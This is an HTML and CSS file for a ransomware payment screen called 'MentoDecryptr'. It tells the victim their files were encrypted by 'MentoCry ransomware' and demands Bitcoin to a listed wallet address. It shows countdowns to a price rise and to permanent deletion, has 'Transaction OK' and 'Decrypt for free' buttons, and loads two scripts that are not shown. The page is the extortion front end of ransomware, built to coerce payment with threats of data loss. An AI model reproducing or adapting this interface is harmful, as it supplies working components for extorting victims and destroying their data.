<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    
    <script type="module" src="m.js" defer></script>
    <script type="module" src="tfl.js" defer></script>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>MentoDecryptr</title>
    <style>
        body {
    background-color: #350c0c;
    margin: 0px;
    color: #ffffff;
    font-family: bold 12px/1.5 Calibri, sans-serif;
}

.ddb {
    width: 80px;
    height: 40px;
    margin: 0px;
    margin-left: 480px;
    margin-top: -25px;
}

.frame h1 {
  margin: 0;
  width: 400px; 
  margin-left: 60px;        
}

#frame1 {
    background-color: #350d0c;
    height: 40px;
    font: bold 12px/1.5 Calibri, sans-serif;
    width: 500px;
    margin-bottom: 10px;
    margin: 2px;
    margin-left: 260px;
}

#frame2 {
    width: 128px;
    height: 128px;
    margin-bottom: 40px;
    margin: 2px;
    margin-left: 60px;
    margin-top: -30px;
}

#frame3 {
    height: 150px;
    width: 230px;
    margin-left: 10px;
    margin-top: 30px;
    border: 1px, solid;
}


#frame3 h1 {
    font: 16px/1.5 Calibri, sans-serif;
    color: #fcf803;
    margin-left: 25px;
    margin-top: 10px;
    margin-bottom: 10px;
}

#frame3 p {
    font: 18px/1.5 E1234, sans-serif;
    color: #ffffff;
    margin-left: 35px;
    margin-top: 30px;
    margin-bottom: 10px;
}

#frame4 {
    height: 150px;
    width: 230px;
    margin-left: 10px;
    margin-top: 10px;
    border: 1px, solid;
}


#frame4 h1 {
    font: 16px/1.5 Calibri, sans-serif;
    color: #fcf803;
    margin-left: 20px;
    margin-top: 10px;
    margin-bottom: 10px;
}

#frame4 p {
    font: 18px/1.5 E1234, sans-serif;
    color: #ffffff;
    margin-left: 35px;
    margin-top: 30px;
    margin-bottom: 10px;
}

#frame5 {
    height: 425px;
    width: 560px;
    margin-left: 250px;
    margin-top: -435px;
    border: 1px, solid;
    background-color: #ffffff;
    color: black;
    padding: 5px;
    overflow: auto;
}

#frame5 h2 {
    font: bold 18px/1.5 Arial, sans-serif;
    color: black;
}

#frame5 p {
    font: 14px/1.5 Arial, sans-serif;
    color: black;
}

#frame6 {
    height: 40px;
    width: 575px;
    margin-left: 250px;
    margin-top: 1px;
    margin-bottom: 10px;
    font: bold 12px/1.5 Calibri, sans-serif;
}

#frame6 button {
    height: 40px !important;
    width: 265px !important;
    margin-left: 230px;
    margin-top: 50px;
    border: 1px, solid;
}

#img {
    margin-left: 50px;
}

#frame6 p {
    font: 16px/1.5 Calibri, sans-serif;
    color: #fcf803;
    margin-left: 20px;
    margin-top: 0px;
    margin-bottom: 10px;
}

#frame6 h3 {
    font: 12px/1.5 Calibri, sans-serif;
    color: #ffffff;
    margin-left: 20px;
    margin-top: 30px;
}

#frame6 button {
    font: 16px/1.5 Calibri, sans-serif;
    margin-left: 20px;
    margin-top: 0px;
    width: 200px;
    height: 30px;
    border-radius: 2px;
}

#frame7 {
    height: 50px;
    width: 230px;
    margin-left: 10px;
    margin-top: -40px;
    border: 1px, solid;
    font: 16px/1.0 Calibri, sans-serif;
}

#frame7 p {
    font: 18px/1.5 Calibri, sans-serif;
    color: #ffffff;
    margin-left: 15px;
    margin-top: 12px;
}

#frame8 {
    height: 40px;
    width: 230px;
    margin-left: 35px;
    margin-top: 5px;
    font: 16px/1.0 Calibri, sans-serif;
}

#frame9 {
    height: 35px;
    width: 500px;
    margin-left: 265px;
    margin-top: -30px;
    border: 1px, solid;
    margin-bottom: 10px;
    font: bold 12px/1.5 Calibri, sans-serif;
}

#frame9 p {
    font: 16px/1.5 Calibri, sans-serif;
    width: 440px;
    color: #fcf803;
    margin-left: 20px;
    margin-top: 5px;
    margin-bottom: 10px;
}

#frame9 h3 {
    font: 12px/1.5 Calibri, sans-serif;
    color: #ffffff;
    margin-left: 20px;
    margin-top: 30px;
}

#frame10 {
    height: 40px;
    width: 40px;
    margin-left: 770px;
    margin-top: -40px;
    margin-bottom: 10px;
    font: bold 12px/1.5 Calibri, sans-serif;
}

#frame10 button{
    height: 30px !important;
    width: 50px !important;
    margin-left: 2px;
    margin-top: -3px;
    border: 1px, solid;
}
    </style>
</head>

<body>
        <div class="frame" id="frame1">
            <h1>Whoops, your files got encrypted!</h1>
            <div class="ddb">
                <select>
                    <option value="e" selected>English</option>
                    <option value="f">Finnish</option>
                    <option value="r">Russian</option>
                    <option value="s">Spanish</option>
                </select>
            </div>
        </div>
        <div class="frame" id="frame2">
            <img src="lck.png">
        </div>
        <div class="frame" id="frame3">
            <h1>
                Decryption price will rise in
            </h1>
            <p>
                03:00:00:00
            </p>
        </div>
        <div class="frame" id="frame4">
            <h1>
                Files will be deleted forever in
            </h1>
            <p>
                06:00:00:00
            </p>
        </div>
        <div class="frame" id="frame5">
            <h2>What just happend?</h2><p>Some of your documents, videos, photos and databases have been encrypted<br> 
                by MentoCry ransomware. Decryption of your files is not possible without your<br>
                personal ID, that is stored at our server. However it is possible to restore your files by<br>
                following next steps.</p>
            <h2>How can I get my files back?</h2><p>If you want to use your files again, please read next part<br>
                very carefully! Send demanded worth of Bitcoin to address below.<br>
                Then, wait few seconds
                and press "Transaction OK", and wait<br> 
                for the program to check blockchains for your<br>
                Bitcoin transaction. You can decrypt some of your files for free by clicking<br> 
                "Decrypt for free". Best time to check for payment is 12:00 - 18:00 GMT.<br>
                If the payment was successful and you sent right amount of<br>
                Cryptocurrency, you can use your files again. If you don't pay in three days, decryption<br>
                price rises from 80€ to 150€.</p>
            <h2>Important to note!</h2><p>You can't decrypt your files without your ID being decrypted<br>
                by this program first! DO NOT TRY TO RENAME YOUR FILES! IT LEADS TO PERMANENT DATA LOSS!!!<br>
                We hope, that you pay soon as possible to get your files back without paying extra.</p>
        </div>
        <div class="frame" id="frame6">
            <br><button class="TOK">Decrypt for free</button><button class="DFF">Transaction OK</button>
        </div>
        <div class="frame" id="frame7">
            <p>Decryption price: 80€</p>
        </div>
        <div class="frame" id="frame8">
            <img src="btc.png">
        </div>
        <div class="frame" id="frame9">
            <p>Bitcoin address: bc1qxcnwcmvfshqv8jxdusqp97zw8uc9xkrlsw79gv</p>
        </div>
        <div class="frame" id="frame10">
            <button>Copy</button>
        </div>
</body>
</html>